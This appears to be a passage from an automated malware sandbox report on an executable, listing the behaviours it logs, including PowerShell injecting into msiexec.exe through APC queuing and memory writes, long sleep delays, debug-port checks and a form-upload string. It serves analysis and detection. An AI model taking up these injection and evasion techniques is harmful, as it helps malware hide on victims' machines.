            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598248s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597912s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597796s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597687s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597574s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597468s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597248s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597140s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -597031s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596921s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596812s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596703s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596593s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596484s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596374s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596265s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -596046s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595937s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595827s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595717s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595499s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595171s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -594841s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -594733s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7152Thread sleep time: -594624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599668Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598248Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597912Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597574Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597468Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597248Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596921Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596593Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596374Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596046Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595827Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595717Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595171Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594841Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594733Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594624Jump to behavior
            Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\^q
            Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\^q
            Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\^q
            Source: powershell.exe, 00000001.00000002.2425707404.000000000581C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd2148b155d302<
            Source: C:\Users\user\Desktop\66776676676.exeAPI call chain: ExitProcess graph end nodegraph_0-3488
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
